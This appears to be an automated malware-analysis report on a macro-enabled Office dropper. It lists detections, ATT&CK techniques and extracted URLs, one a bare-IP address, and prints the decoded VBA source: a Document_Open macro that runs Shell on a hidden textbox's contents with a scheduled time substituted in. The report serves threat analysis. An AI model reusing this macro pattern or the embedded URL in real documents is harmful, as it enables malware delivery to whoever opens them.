MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1203 Exploitation for Client Execution
The sample contains VBA macros, including a Document_Open macro that triggers a Shell() call. This indicates the document is designed to execute arbitrary code upon opening after the user enables macros, a common lure technique. The Shell() function is used to execute a command, likely downloading and running a second-stage payload from one of the embedded URLs.
Heuristics 6
-
ClamAV: Doc.Dropper.Agent-6995814-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6995814-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
Macro/content-enable lure medium SE_ENABLE_LUREDocument instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://149.5.209.70/02m In document text (OLE body)
- http://t2.symcb.com0In document text (OLE body)
- http://tl.symcd.com0&In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
- http://t1.symcb.com/ThawtePCA.crl0In document text (OLE body)
- http://tl.symcb.com/tl.crl0In document text (OLE body)
- https://www.thawte.com/cps0/In document text (OLE body)
- https://www.thawte.com/repository0WIn document text (OLE body)
- http://tl.symcb.com/tl.crt0In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1194 bytes |
SHA-256: 1f0245d93700aabafb35cacaf433e96e1d02eecfaf20761f15ede39495e54b07 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub document_open()
UserForm2.Show
End Sub
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{754FE6C8-894D-421A-BE2E-219BD6703826}{48CDF552-CD0A-4C57-9D93-034C76ACB2F6}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{CD3D3734-5001-432D-9F0F-6F37367B1986}{377F3929-FC37-4EBB-87F3-A93FE2E1415F}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub UserForm_Activate()
Dim time
time = Format(Now + TimeSerial(0, 0, 19), "hh:mm")
Shell Replace(UserForm1.TextBox1.Text, "12:12", time)
Unload Me
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.